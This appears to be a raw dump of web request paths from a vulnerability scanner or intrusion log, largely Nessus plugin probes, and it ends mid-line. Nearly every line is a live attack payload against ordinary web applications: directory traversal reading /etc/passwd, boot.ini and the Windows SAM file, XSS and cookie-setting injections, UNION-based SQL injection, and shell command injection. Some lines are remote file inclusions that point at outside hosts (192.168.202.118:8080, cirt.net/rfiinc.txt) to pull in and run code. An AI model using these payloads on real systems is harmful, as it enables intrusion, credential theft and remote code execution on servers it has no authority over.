#\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/cgi.cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/scripts/protection.php?action=logout&siteurl=/etc/passwd\n/en-us/jnv890lt.cgi?<script>cross_site_scripting.nasl</script>\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/javascript/typo3conf.exe\n/egaet53a.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7o5qp766.dll?<script>cross_site_scripting.nasl</script>\n/webcgi/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/en-us/esmozg5d.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bn857frh.php3?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/account/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/manager/base_qry_common.php?base_path=/etc/passwd\\x00\n/recordings/cal_week.php?op=week&catview=999'\n/javascript/db.exe\n/javascript/stackdump.exe\n/osama bin laden video transcript afterdeath/\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331923195')</script>\n/..%5c..%5c..%5c..%5c..%5c../winnt/repair/sam\n/if69ddo1.dll?<script>document.cookie=\"testiabz=5220;\"</script>\n/javascript/21.exe\n/rpxyx07v.kspx?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd\n/examples/jsp/checkbox/mapserv.exe?map=mapserver_detect.nasl.map\n/main.php?stuff=';rm q39366727 #\n/cgi-perl/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/gy23xnjq.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/help.php?q=ver\\x09>q75585226&rem\\x09\n/javascript/science.exe\n/htpasswd/\n/?<meta http-equiv=set-cookie content=\"testyias=101\">\n/top.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/main.php?stuff=\"ver\\x0b>q47639929&rem\\x0b\n/passwdqc/\n/javascript/jar.exe\n/help.php?q='\\x0arm\\x09q12762848\\x09#\n/lmw4r201.php?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/p043snfr.nsf?<script>cross_site_scripting.nasl</script>\n/zln2hm2z.html?<script>document.cookie=\"testblcp=8120;\"</script>\n/javascript/gprs.exe\n/javascript/smile.exe\n/if69ddo1.pl?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/phpmyadmin/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/top.php?stuff=\"&ver\\xa0>q97411474&rem\\xa0\n/c/winnt/system32/cmd.exe?/c+dir+/og\n/oie504mr.mscgi?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/cacti/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/en-us/jnv890lt.htm?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"rm q55141299 #\n/javascript/~chris.exe\n/en-us/33y9gcqq.exe?<script>document.cookie=\"testnvxc=4301;\"</script>\n/help.php?q=\"ping -w 7000 -n 1 1.2.3.4&rem \n/javascript/groups.exe\n/cgi-binmultihtml.pl?multi=/etc/passwd\\x00html\n/bn857frh.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/promotion.exe\n/archive.php?scriptpath=http://192.168.202.96:8080/whmch8ftkt7kv??\n/esmozg5d.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mpcgi/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/q703m78q.pl?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/help.php?q='sleep 11 #\n/news.php?scriptpath=http://192.168.202.118:8080/ghl9il??\n/top.php?stuff=\"&ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n//<body><script src=http://www.example.com/test?rnd=q77632674></script>\n/nyvbv05h.php3?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/main.php?logout=&del;q53872587&rem;\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331908880','5'--\n/examples/jsp/num/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/cgi-bin/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/examples/jsp/num/sendtemp.pl?templ=../../../../../etc/passwd\n/top.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/hipscript/\n/examples/jsp/colors?username=\"<script>foo</script\n/help.php?q=ping;-w;11000;-n;1;1.2.3.4&rem;\n/phpmyadmin/edit.jsp?page=user&editor=../../../install\n/scripts/comments.php?sort_by=phpwebgallery_sort_by_sql_injection.nasl\n/examples/jsp/cal/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/scripts/buoalakxhatu.html\n/vac1l5vm.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ygkjkngd.pl?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/colors/whois.cgi?action=load&whois=;id\n/cookie/?name=nessus&value=<script>alert('jetty_cookie_xss.nasl')</script>&age=288\n<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/cgi-bin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/manager/index.php?show=/etc/passwd\n/phpimageview.php?pic=javascript:alert(8754)\n/examples/jsp/checkbox/docs.php?doc=../jpgraph-1.12.1/docs/index\n/javascript/accounting.exe\n/0u75ldxq.aspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/includes/config.php?relative_script_path=http://xxxxxxx\n/top.php?stuff=;sleep\\x0910\\x09#\n/8t9v8k7x.do?<script>document.cookie=\"testhvje=9403;\"</script>\n/raanw4ia.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='&rm\\x09q47285252\\x09#\n/dslpwt15.idc?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/ghswfouu.dll?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/scripts/php-ping.php?host=test&submit=ping!&count=1|id||\n/j2kdmfw4.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/esmozg5d.dll?<script>cross_site_scripting.nasl</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1331909171)</script>\n/javascript/appslocallogin.exe\n/javascript/emu.exe\n/cgi-bin/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/search/show.pl?url=file:/etc/passwd\n/cacti/a1disp3.cgi?/../../../../../../etc/passwd\n/bemarket/postscript/postscript.php?p_mode=@rfiurl\n/t578vqea.do?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/ao22ww7y.jsp?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/javascript/.passwd.jsp\n/en-us/manager/launcher/admin/directory?app_only=1&ns=xss\n/scriptztemplatez/\n/help.php?q=\"&rm,q66241785&rem,\n/eei78ore.kspx?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm q49814877&rem \n/dda2qr7j.fts?<script>cross_site_scripting.nasl</script>\n/pxagj7n7.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/qg9h0c0svvat.php3\n/vac1l5vm.exe?<script>cross_site_scripting.nasl</script>\n/jdx255ea.php3?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/en-us/esmozg5d.x?<script>cross_site_scripting.nasl</script>\n//comment.php?mode=delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/main.php?logout=\"&ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/javascript/bb-histlog.exe\n/en-us/9kr0ih0v.aspx?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\\x00\n/cgi-sys/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/examples/jsp/jsp2/el/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/javascript/document.db\n/cgi-bin/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/main.php?stuff='&uname #\n/typescript/\n/scripts/?mode=debug\n/examples/jsp/colors/faq.php?action=&type=view&s=&id=-1' union select 0,1997959680,0,0,0,0,0--\n/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\\x00&bn=fm_d1\n/scripts/1331904651-ror_session_fixation.nasl\n/pxagj7n7.asp?<script>cross_site_scripting.nasl</script>\n/hjdzm96v.exe?<script>document.cookie=\"testbyqe=7474;\"</script>\n/main.php?stuff=\"uname\\x09>q65882978\\x09#\n/javascript/lost+found.exe\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.96:8080/4dckqcc0acprbz?\n/player.exe/\n/vjbrrppi.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/utilities.exe\n/examples/servlets/servlet/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/examples/jsp/sessions?username=\"<script>foo</script\n/javascript/inquiries.exe\n/help.php?q=\"|ping,-w,8000,-n,1,4.3.2.1|rem,\n/d7ktpmcq.fts?<script>cross_site_scripting.nasl</script>\n/de3v2dd9.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gy23xnjq.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"del\\x0bq22255946&rem\\x0b\n/l752x1ry.nsf?<script>cross_site_scripting.nasl</script>\n/en-us/account/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/main.php?stuff=\"\\x0auname\\x09>q95586715\\x09#\n/scripts/search.aspx\n/gvx7m5ti.idc?<script>document.cookie=\"testwldz=3506;\"</script>\n/javascript/document.old\n/help.php?q=&del;q75765892&rem;\n/yef5f3d5.asp?<script>document.cookie=\"testcrcv=6167;\"</script>\n/transcript_may050127/\n/javascript/hourly.exe\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/javascript/myadmin.exe\n/cgi-local/windmail.exe\n/20review.asp?productcode='\n/mpcgi/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/awin_subscriptions/\n/mailman/admin/ml-name?\\\"><script>alert('vulnerable')</script>;\n/vjbrrppi.exe?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?p='nessus\n/help.php?q=\"&rm q16957345 #\n/o6ebbirj.cfm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/?<script>document.cookie=\"testfutf=1550;\"</script>\n/if69ddo1.php3?<script>document.cookie=\"testiabz=5220;\"</script>\n/javascript/dl.exe\n/javascript/eu.exe\n/examples/jsp/num/phf?qalias=x\\x0a/bin/cat /etc/passwd\n/ygkjkngd.nsf?<script>document.cookie=\"testnago=4518;\"</script>\n/awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/gjehhrjnrx0;echo|awstats679107.txt\n/main.php?frm_daynight=day&frm_passwd=q96852141&frm_referer=http%3a//192.168.24.202/main.php&frm_user=&scr_height=&scr_width=\n/main.php?stuff=\"del;q74579968&rem;\n/bxnyrhmh.jsp?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/e9rx3ya4.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/lce0cbkfb8xx.html\n/cgi-bin/port.php?proto=tcp'\n/shopexd.asp?catalogid='42\n/phpmyadmin/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://cirt.net/rfiinc.txt??\n/examples/jsp/sessions/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/preview.php?php_script_path=http://inexistent_hacker_box/lib.php\n/hjdzm96v.htm?<script>document.cookie=\"testbyqe=7474;\"</script>\n/examples/jsp/error/index.php?entry='\n/examples/jsp/jsp2/el/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??\n/cgi-915/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/paypalxss/\n/././././././../../../../../winnt/win.ini\n/examples/jsp/colors/include/sql.php?include_path=/etc/passwd\\x00\n/managersearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/examples/jsp/jsp2/jspx/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/examples/jsp/checkbox/search.jsp?q=%\"<script>alert(1331904373)</script>\n/j4oqyvga.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/v3axg1p8.php3?<script>document.cookie=\"testxagh=6987;\"</script>\n/main.php?stuff='\\x0duname\\x09>q12818567\\x09#\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>\n/i7prbs22.do?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/tuwjta1w.jsp?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/top.php?stuff='\n/vhzmaia2.jsp?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/en-us/account/index.php?entry='\n/chang'e_program/\n/?<script>document.cookie=\"testiklc=904;\"</script>\n/examples/jsp/cal/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_gzot_utg]));die;/*\n/phpslideshow.php?directory=x'><script>alert(414085588137)</script><'\n/noscriptfailover/\n/javascript/bz2.exe\n/scripts/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/rzemxyjqrg.sh;echo|awstats990895.txt\n/javascript/services.exe\n/0w155a7c.html?<script>cross_site_scripting.nasl</script>\n/en-us/account/shopper.cgi?newpage=../../../../../../etc/passwd\n/b1q8bywu.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/pgvnuke/pgvindex.php?document_root/header.php=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/manager/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1\n/hjdzm96v.aspx?<script>document.cookie=\"testbyqe=7474;\"</script>\n/zv8tv7h8.pl?<script>document.cookie=\"testcqwz=9752;\"</script>\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 469168500--\n/esmozg5d.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"ver\\x09>q19467518&rem\\x09\n/azcrfs8d.cgi?<script>document.cookie=\"testjpdr=9205;\"</script>\n/webcgi/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/j4oqyvga.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1424302611--\n/xamp_stop.exe\n/qczkquis.php3?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/examples/jsp/sessions/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/n1afe1y6.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331909287')</script>\n/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>\n/9ko6m4c8.pl?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+f+0+1a00+0+>>ctdn\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/o1zj4u9v.do?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/examples/jsp/jsp2/el/phptonuke.php?filnavn=/etc/passwd\n/examples/jsp/checkbox/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/gvx7m5ti.cfm?<script>document.cookie=\"testwldz=3506;\"</script>\n/cacti/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/examples/jsp/jsp2/jspx/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/index.php?page=/etc/passwd\\x00\n/main.php?stuff=\"\\x0arm q72652917 #\n/scripts/ui/login?user=nessus-1331909113\n/examples/jsp/jsp2/el/cwmail.exe\n/i686v90l.php3?<script>document.cookie=\"testfutf=1550;\"</script>\n/bxnyrhmh.cfm?<script>document.cookie=\"testmjct=1867;\"</script>\n/en-us/hipkz026.html?<script>document.cookie=\"testyrbs=2855;\"</script>\n/examples/jsp/error/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/phpmyadmin/index.php?search=<script>foo</script>\n/m4kkjf8l.html?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--&blogid=1\n/examples/jsp/jsp2/el/index.php?page=/etc/passwd\\x00\n/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/help.php?q=\"ver,>q74835818&rem,\n/en-us/account/zpanel.php?page=/etc/passwd\\x00\n/javascript/mojo.exe\n/javascript/groupcp.exe\n/manager/index.php?site=../../../../../../../../etc/passwd\\x00\n/pxagj7n7.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/convert.bas\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/ltelnhamax.sh'); function v\n/nuh3zirz.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ht8pn8uq.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/index.php?cat_select=<script>foo</script>\n/en-us/dda2qr7j.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/index.php?configfile=../../../../../../../../../etc/passwd\n/rpxyx07v.asp?<script>document.cookie=\"testbnli=1975;\"</script>\n/en-us/account/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/help.php?q=\"del\\x09q75241669&rem\\x09\n/top.php?stuff=\"\\x0adel\\x09q64118446\\x09#\n/main.php?stuff=\"&rm q86234546&rem \n/rpxyx07v.mscgi?<script>document.cookie=\"testbnli=1975;\"</script>\n/pxagj7n7.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/u95h6ymu.kspx?<script>document.cookie=\"testkhwc=4028;\"</script>\n/en-us/i686v90l.jsp?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/help.php?q=\"&ver;>q69128354&rem;\n/examples/jsp/jsp2/jspx/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/jw64yq8u.htm?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/help.php?q=&ver\\x0c>q96311231&rem\\x0c\n/transcripts/\n/sco0078-1passwd/\n/guestbook/?number=5&lng=<script>alert(document.domain);</script>\n/main.php?stuff=&ver\\xa0>q94142887&rem\\xa0\n/description.xml\n/ajax security web application xhr attack surface xss jeremiah grossman article javascript/\n/cgi-script/\n/script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm??\nftp://192.168.23.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/transcript132/\n/confirmunsubscription.php?output=@rfiurl\n/main.php?stuff=';rm\\x09q44154782\\x09#\n/javascript/.passwd.pem\n/kai's_supergoo/\n/zmvq66jy.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/fixed.exe\n/examples/jsp/error/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/3j8echh0.dll?<script>document.cookie=\"testfuqi=4189;\"</script>\n/phpmyadmin/main.php?g2_itemid=../../../../../license\\x00\n/scripts/main.php?g2_itemid=../../../../../license\\x00\n/javascript/paper.exe\n/javascript/subscriptions.exe\n/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/h21y8w52.jspa?<script>cross_site_scripting.nasl</script>\n/script/param/param.inc.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/cgi-bin/shoutbox.php?conf=../../../../../../../../etc/passwd\n/rpxyx07v.aspx?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/scripts/tomcat_proxy_directory_traversal.nasl1331904457\n/scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,602648682 --\n/help.php?q=\"\\x0asleep\\x097\\x09#\n/launch.jsp?nfuse_application=>alert(document.cookie);</script>\n/hpqtranscript121206/\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/ikdwpiudzb0;'); function v\n/javascript/hosts.exe\n/xsqln7eb.fts?<script>document.cookie=\"testpcbb=9254;\"</script>\n/iktok2bw.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- \n/javascript/htpasswd.7z\n/recordings/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/nmw0do67.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.html?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/occam's_razor/\n/en-us/7o5qp766.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/egaet53a.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/kb.asp?a=\"><script>alert('wvs-xss-magic-string-411486083435')</script>\n/h5i6crm3.asp?<script>document.cookie=\"testlihk=7070;\"</script>\n/javascript/ms-sql.exe\n/0w155a7c.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/webcgi/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/fc9t54l7.fts?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/cgi-win/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/igtf0zon.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/forum/database/ezsiteforum.mdb\n/examples/jsp/jsp2/el/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/fcgi-bin/pfdisplay.cgi?'\\x0a/bin/cat /etc/passwd|'\n/help.php?q=\"|ping,-w,11000,-n,1,1.2.3.4|rem,\n/w4996nr0.idc?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/scriptler/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/ukirnkmpbn;\"\n/scripts/modules/printing/output.php?url=li4vli4vli4vli4vli4vli4vli4vli4vli4vzxrjl3bhc3n3za==\n/shop/member_html.cgi?file=;cat /etc/passwd|\n/en-us/odzk29aa.asp?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/bl8sefdm.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/weq93ppb.jsp?<script>cross_site_scripting.nasl</script>\n/l4fz1dqw.jsp?<script>cross_site_scripting.nasl</script>\n/script-63/\n/help.php?q=\"rm q65533214&rem \n/qhvu0pdg.dll?<script>document.cookie=\"testchuc=2100;\"</script>\n/qb2xy9aw.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/sql.php?db=openemr&token=87bb516998e94bcddad002864b11a299&table=prescriptions&pos=0\n/copatranscript_20061106/\n/scripts/nffhikq061nq.cfm\n/j4rdyhw8.x?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/ywaxntrx.pl?<script>cross_site_scripting.nasl</script>\n/weq93ppb.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/fgos1sb1c1tr.sh\n/l4fz1dqw.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+q+>>esbq\n/bmeun223.nsf?<script>document.cookie=\"testhhwu=7044;\"</script>\n/u95h6ymu.idc?<script>document.cookie=\"testkhwc=4028;\"</script>\n/vac1l5vm.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd\n/cacti/index.php?search=<script>alert('cmsimple_search_xss.nasl');</script>&function=search\n/................../etc/passwd\n/webcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/index.php?src=1&_common=1&time=1331904242&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/lang/index.php?file=/etc/passwd\n/cgi-bin/way-board/way-board.cgi?db=/etc/passwd\\x00\n/xlj7h65o.cgi?<meta http-equiv=set-cookie content=\"testtbbe=856\">\n/script/fckeditor/editor/dialog/fck_image.html\n/scripts/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/top.php?stuff=\"&del\\x09q26831864\\x09#\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/help.php?q=ver\\x0c>q83193297&rem\\x0c\n/l13b77e5.html?<script>document.cookie=\"testjvvf=7721;\"</script>\n/8t9v8k7x.kspx?<script>document.cookie=\"testhvje=9403;\"</script>\n/examples/jsp/sessionssearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/spymacxss/\n/jnt3f86c.htm?<script>document.cookie=\"testcmax=9270;\"</script>\n/clk;59162380;7163019;i/\n/complete_scripts/\n/hrttz9fj.asp?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/examples/jsp/colors/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/javascript/document.tgz\n/javascript/perl.exe\n/javascript/document.aspx\n/9kr0ih0v.aspx?<script>document.cookie=\"testzgnm=1183;\"</script>\n/javascript/.passwd\n/<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/miz4r5hz.asp?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/o35zot2r.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qhvu0pdg.jspa?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/ht8pn8uq.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/uc3w3bdi.php3?<script>document.cookie=\"testxllt=9940;\"</script>\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/free_subscriptiontop/\n/top.php?stuff='\\x0drm q21221735 #\n/hipscriptdoc/\n/javascript/.htpasswd.sfish/4294967296\n/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd\n/javascript/cfide.exe\n/main.php?stuff=&ver&rem;\n/dslpwt15.nsf?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/b5xdqgz2.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/primal script and primal code/\n/en-us/h5sc3gxy.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bl8sefdm.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/shoutbox.php?conf=../\n/phpmyadmin/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/main.php?stuff=\"ping -w 11000 -n 1 1.2.3.4|rem \n/en-us/account/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/main.php?stuff=\"\\x0auname\\x09>q72429699\\x09#\n/add_comment.php?id=\"><script>alert(411306083432)</script><\"\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://cirt.net/rfiinc.txt??\n/help.php?q=\"&ver,>q25917292&rem,\n/scripts/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/scripts/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/lsoix5h3.jsp?<script>cross_site_scripting.nasl</script>\n/tramadol_prescription/\n/scripts/..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/4dckqcc0acprbz?\n/scripts/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_gd2bness]));die;/*\n/8x6w469u.x?<script>document.cookie=\"testgfjr=1286;\"</script>\n/recordings/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/x2gyorli.mscgi?<